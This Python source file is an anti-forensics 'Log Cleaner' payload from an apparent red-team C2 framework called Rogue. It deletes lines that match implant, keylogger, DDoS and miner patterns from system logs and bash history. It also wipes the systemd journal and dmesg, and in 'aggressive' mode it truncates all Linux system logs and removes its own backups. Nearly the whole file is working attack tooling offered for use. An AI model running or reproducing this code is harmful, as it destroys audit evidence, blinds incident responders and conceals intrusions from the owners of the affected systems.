forked from ek0mssavi0r/Rogue
296 lines
10 KiB
Python
296 lines
10 KiB
Python
#!/usr/bin/env python3
|
|
"""
|
|
PAYLOAD: Log Cleaner
|
|
DESCRIPTION: Removes forensic traces from system logs
|
|
AUTHOR: Rogue Red Team
|
|
VERSION: 2.0
|
|
SECURITY: This tool modifies system logs - Use only on authorized systems
|
|
"""
|
|
import os, sys, re, subprocess, datetime, json, hashlib
|
|
|
|
class LogCleaner:
|
|
def __init__(self, implant_id=None):
|
|
self.implant_id = implant_id or self.get_implant_id()
|
|
self.log_patterns = [
|
|
r'rogue_implant',
|
|
r'rogue_agent',
|
|
r'systemd-journald.*python',
|
|
r'python3.*\.cache/\.rogue',
|
|
r'polyloader',
|
|
r'ddos\.py',
|
|
r'mine\.py',
|
|
r'keylogger',
|
|
r'screenshot',
|
|
self.implant_id
|
|
]
|
|
|
|
# System log files to clean
|
|
self.log_files = {
|
|
'linux': [
|
|
'/var/log/auth.log',
|
|
'/var/log/syslog',
|
|
'/var/log/messages',
|
|
'/var/log/secure',
|
|
'/var/log/kern.log',
|
|
'/var/log/dmesg',
|
|
'/var/log/boot.log',
|
|
'/var/log/cron',
|
|
'/var/log/maillog',
|
|
'/var/log/spooler',
|
|
'/var/log/lastlog',
|
|
'/var/log/wtmp',
|
|
'/var/log/btmp',
|
|
'/var/log/utmp',
|
|
'/var/log/faillog'
|
|
],
|
|
'bash_history': [
|
|
os.path.expanduser('~/.bash_history'),
|
|
'/root/.bash_history'
|
|
],
|
|
'application_logs': [
|
|
os.path.expanduser('~/.cache/.rogue/.implant.log')
|
|
]
|
|
}
|
|
|
|
def get_implant_id(self):
|
|
"""Generate implant identifier for pattern matching"""
|
|
import socket, getpass
|
|
hostname = socket.gethostname()
|
|
username = getpass.getuser()
|
|
return hashlib.md5(f"{hostname}_{username}".encode()).hexdigest()[:8]
|
|
|
|
def clean_file(self, filepath):
|
|
"""Remove matching lines from a file"""
|
|
if not os.path.exists(filepath):
|
|
return {"file": filepath, "status": "not_found"}
|
|
|
|
try:
|
|
with open(filepath, 'r') as f:
|
|
lines = f.readlines()
|
|
|
|
original_count = len(lines)
|
|
|
|
# Filter out lines matching any pattern
|
|
new_lines = []
|
|
for line in lines:
|
|
if not any(re.search(pattern, line, re.IGNORECASE) for pattern in self.log_patterns):
|
|
new_lines.append(line)
|
|
|
|
removed_count = original_count - len(new_lines)
|
|
|
|
if removed_count > 0:
|
|
# Backup original file
|
|
backup_path = f"{filepath}.rogue_backup"
|
|
if not os.path.exists(backup_path):
|
|
with open(backup_path, 'w') as f:
|
|
f.writelines(lines)
|
|
|
|
# Write cleaned file
|
|
with open(filepath, 'w') as f:
|
|
f.writelines(new_lines)
|
|
|
|
return {
|
|
"file": filepath,
|
|
"status": "cleaned",
|
|
"removed": removed_count,
|
|
"backup": backup_path
|
|
}
|
|
else:
|
|
return {
|
|
"file": filepath,
|
|
"status": "no_matches",
|
|
"removed": 0
|
|
}
|
|
|
|
except Exception as e:
|
|
return {
|
|
"file": filepath,
|
|
"status": "error",
|
|
"error": str(e)
|
|
}
|
|
|
|
def clean_bash_history(self):
|
|
"""Clean bash history files"""
|
|
results = []
|
|
|
|
for history_file in self.log_files['bash_history']:
|
|
if os.path.exists(history_file):
|
|
result = self.clean_file(history_file)
|
|
results.append(result)
|
|
|
|
# Also clear current session history
|
|
if history_file == os.path.expanduser('~/.bash_history'):
|
|
subprocess.call('history -c', shell=True)
|
|
subprocess.call('history -w', shell=True)
|
|
|
|
return results
|
|
|
|
def clean_system_logs(self):
|
|
"""Clean system log files"""
|
|
results = []
|
|
|
|
for log_file in self.log_files['linux']:
|
|
result = self.clean_file(log_file)
|
|
results.append(result)
|
|
|
|
return results
|
|
|
|
def clean_application_logs(self):
|
|
"""Clean application-specific logs"""
|
|
results = []
|
|
|
|
for log_file in self.log_files['application_logs']:
|
|
result = self.clean_file(log_file)
|
|
results.append(result)
|
|
|
|
return results
|
|
|
|
def clear_memory_logs(self):
|
|
"""Clear log-related memory"""
|
|
results = []
|
|
|
|
try:
|
|
# Clear systemd journal
|
|
if os.path.exists('/bin/journalctl'):
|
|
subprocess.call('journalctl --vacuum-time=1s 2>/dev/null', shell=True)
|
|
subprocess.call('journalctl --rotate 2>/dev/null', shell=True)
|
|
results.append({
|
|
"action": "systemd_journal_clear",
|
|
"status": "success"
|
|
})
|
|
|
|
# Clear dmesg
|
|
subprocess.call('dmesg -c 2>/dev/null', shell=True)
|
|
results.append({
|
|
"action": "dmesg_clear",
|
|
"status": "success"
|
|
})
|
|
|
|
except Exception as e:
|
|
results.append({
|
|
"action": "memory_logs_clear",
|
|
"status": "error",
|
|
"error": str(e)
|
|
})
|
|
|
|
return results
|
|
|
|
def execute(self, clean_level="aggressive"):
|
|
"""Execute log cleaning based on level"""
|
|
results = {
|
|
"timestamp": datetime.datetime.now().isoformat(),
|
|
"clean_level": clean_level,
|
|
"operations": []
|
|
}
|
|
|
|
try:
|
|
print("[+] Starting log cleaning operations...")
|
|
|
|
# Always clean application logs
|
|
print("[+] Cleaning application logs...")
|
|
app_results = self.clean_application_logs()
|
|
results["operations"].extend(app_results)
|
|
|
|
# Clean bash history
|
|
print("[+] Cleaning bash history...")
|
|
bash_results = self.clean_bash_history()
|
|
results["operations"].extend(bash_results)
|
|
|
|
if clean_level in ["moderate", "aggressive"]:
|
|
print("[+] Cleaning system logs...")
|
|
sys_results = self.clean_system_logs()
|
|
results["operations"].extend(sys_results)
|
|
|
|
if clean_level == "aggressive":
|
|
print("[+] Clearing memory logs...")
|
|
mem_results = self.clear_memory_logs()
|
|
results["operations"].extend(mem_results)
|
|
|
|
# Additional aggressive measures
|
|
print("[+] Performing aggressive cleanup...")
|
|
aggressive_results = self.aggressive_cleanup()
|
|
results["operations"].extend(aggressive_results)
|
|
|
|
# Generate summary
|
|
total_cleaned = sum(op.get("removed", 0) for op in results["operations"] if isinstance(op, dict))
|
|
total_errors = sum(1 for op in results["operations"] if isinstance(op, dict) and op.get("status") == "error")
|
|
|
|
results["summary"] = {
|
|
"total_operations": len(results["operations"]),
|
|
"total_lines_removed": total_cleaned,
|
|
"total_errors": total_errors
|
|
}
|
|
|
|
print(f"[+] Log cleaning complete. Removed {total_cleaned} lines across {len(results['operations'])} files.")
|
|
|
|
# Save results
|
|
output_dir = os.path.expanduser("~/.cache/.rogue/cleanup")
|
|
os.makedirs(output_dir, exist_ok=True)
|
|
|
|
output_file = os.path.join(output_dir, f"logclean_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.json")
|
|
with open(output_file, 'w') as f:
|
|
json.dump(results, f, indent=2, default=str)
|
|
|
|
return json.dumps(results["summary"], indent=2)
|
|
|
|
except Exception as e:
|
|
return f"[!] Log cleaning failed: {str(e)}"
|
|
|
|
def aggressive_cleanup(self):
|
|
"""Additional aggressive cleanup measures"""
|
|
results = []
|
|
|
|
try:
|
|
# Overwrite log files with null data
|
|
for log_file in self.log_files['linux']:
|
|
if os.path.exists(log_file):
|
|
try:
|
|
# Truncate file
|
|
open(log_file, 'w').close()
|
|
results.append({
|
|
"file": log_file,
|
|
"action": "truncated",
|
|
"status": "success"
|
|
})
|
|
except:
|
|
pass
|
|
|
|
# Remove backup files
|
|
import glob
|
|
backup_files = glob.glob("/var/log/*.rogue_backup") + glob.glob("~/.cache/.rogue/*.backup")
|
|
for backup in backup_files:
|
|
try:
|
|
os.remove(backup)
|
|
results.append({
|
|
"file": backup,
|
|
"action": "backup_removed",
|
|
"status": "success"
|
|
})
|
|
except:
|
|
pass
|
|
|
|
except Exception as e:
|
|
results.append({
|
|
"action": "aggressive_cleanup",
|
|
"status": "error",
|
|
"error": str(e)
|
|
})
|
|
|
|
return results
|
|
|
|
def rogue_integration():
|
|
"""Wrapper for Rogue C2 integration"""
|
|
import argparse
|
|
|
|
parser = argparse.ArgumentParser(description='Rogue Log Cleaner')
|
|
parser.add_argument('--level', choices=['light', 'moderate', 'aggressive'],
|
|
default='moderate', help='Cleaning intensity level')
|
|
|
|
args, unknown = parser.parse_known_args()
|
|
|
|
cleaner = LogCleaner()
|
|
return cleaner.execute(clean_level=args.level)
|
|
|
|
if __name__ == "__main__":
|
|
print(rogue_integration())
|